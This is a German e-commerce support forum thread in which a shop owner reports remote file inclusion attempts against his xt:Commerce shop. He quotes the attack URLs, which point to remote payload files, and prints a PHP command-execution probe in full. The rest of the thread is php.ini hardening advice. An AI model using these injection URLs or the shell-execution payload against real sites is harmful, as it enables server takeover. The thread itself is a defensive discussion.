#1 (permalink)  
Alt 30.07.2009, 19:04
Neuer Benutzer
 
Registriert seit: 07.06.2009
Beiträge: 10
Standard Zum Thema Sicherheit: Angriffe auf das Shopsystem

Guten Tag,

heute ist mir im Who's online Modul dieser Besucher aufgefallen.
Er hat offensichtlich versucht auf Shopinterne Daten zuzugreifen, mit folgendem, per Hand eingegebenen Aufruf:

00:07:38 0 Guest 91.121.89.135 20:09:31 20:09:31 /index.php?cat=c802_Handys---Navigation.html%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.anyche.com/goods_img1/satu.txt??

Was könnte er damit bezwecken wollen und wie muss ich das bewerten?
Vielen Dank für Ratschläge.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #2 (permalink)  
Alt 30.07.2009, 20:06
Neuer Benutzer
 
Registriert seit: 07.06.2009
Beiträge: 10
Standard

Und noch einer:

00:11:20 0 Guest 80.249.173.242 21:17:02 21:17:02/index.php?cat=c802_Handys---Navigation.html///?_SERVER[DOCUMENT_ROOT]=http://www.red-zone.com.ua/ec.txt??

http://www.red-zone.com.ua/ec.txt sieht so aus:

Die Textdatei <?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Geändert von Saunders Computer (30.07.2009 um 20:11 Uhr)
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #3 (permalink)  
Alt 30.07.2009, 20:19
VEYTON Service Partner
 
Registriert seit: 30.03.2009
Beiträge: 1.507
Standard

Hallo,

schau mal hier, hab ich bei google.de gefunden. Da muss ich das nicht erklären, handelt sich um eine versuchte PHP Injection.

Link: Umfangreiche PHP-Abfragen via Kotaktmodul von NukeStyles Contact!

Edit: Das habe ich noch hier im Forum gefunden: Hackversuch ?!?!

Viele Grüße,
df:bug
__________________
xt:commerce 4 VEYTON-Reseller, Service-Partner & Solution-Partner
shopx.de - shopx.de/blog - twitter.com/shopxperts - Kostenlose Plugins - shopxperts

Geändert von df:bug (30.07.2009 um 20:22 Uhr)
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #4 (permalink)  
Alt 31.07.2009, 00:16
Neuer Benutzer
 
Registriert seit: 07.06.2009
Beiträge: 10
Standard php.ini Sicherheitseinstellungen

so jetzt habe ich darauf geachtet, dass
in der php.ini eingestellt ist:

allow_url_fopen = Off
disable_functions = exec,passthru,shell_exec,system,proc_close,proc_ge t_status,proc_nice,proc_open,proc_terminate
register_globals = Off
SafeMode = On

Habt Ihr vll. noch ein paar Vorschläge?

Teilweise wurde berichtet, das o.g. Code auch über das Kontaktformular eingeschleust werden kann.
Kann man dem auch entgegenwirken?

Gruß
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #5 (permalink)  
Alt 31.07.2009, 07:33
VEYTON Service Partner
 
Registriert seit: 30.03.2009
Beiträge: 1.507
Standard

Hallo,

wer will kommt irgendwie rein, aber so bist du auf einem gutem Wege, sind die Kleinigkeiten weg, wird es für den Angreifer schwieriger.

Viele Grüße,
df:bug
__________________
xt:commerce 4 VEYTON-Reseller, Service-Partner & Solution-Partner
shopx.de - shopx.de/blog - twitter.com/shopxperts - Kostenlose Plugins - shopxperts
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #6 (permalink)  
Alt 05.09.2009, 22:02
Neuer Benutzer
 
Registriert seit: 07.06.2009
Beiträge: 10
Standard

Hierbei handelt es sich eindeutig um einen unzulässigen zugriff........
hilft da noch eine einfache ip sperre über .htacess oder muss man das direkt in der product_info.php ausschließen? (root server)

Hat jemand ähnliche Beobachtungen gemacht und wenn ja, kann mir einer sagen was ich davon halten soll?

Aus Who's online:

78.34.43.47 22:46:27 22:46:27
/product_info.php?info=http://217.218.225.2:2082/index.html?

Vielen Dank
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
Antwort

Lesezeichen

Stichworte
angriffe, shopsystem, sicherheit, thema

Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are aus
Pingbacks are aus
Refbacks are aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
PayPal Express Modul mit GiroPay - Stand 08.05.2012 mikkel PayPal Express-Kaufabwicklung für xt:Commerce 288 27.04.2012 18:07
[NEWS - Shopbetreiber] Aktuelle Rechtsprechung zum Thema Vertragsfallen im Internet News xt:Commerce Mitteilungen 0 29.05.2009 10:10
[NEWS - Shopbetreiber] Urteile zum Rechtsmissbrauch - Teil 1: Das Grundlagen-Urteil d News xt:Commerce Mitteilungen 0 24.04.2009 17:50
Alternative zu einem Iframe?! kaktus82 Template System 18 14.05.2008 08:35
Produktives Shopsystem local auf xammp instalieren skinart Installation und Konfiguration 9 15.05.2007 18:12


Alle Zeitangaben in WEZ +1. Es ist jetzt 22:39 Uhr.

Copyright © 2011 xt:Commerce GmbH / xt:Commerce International Ltd. - All Rights Reserved

xt:Commerce is a SafeCharge brand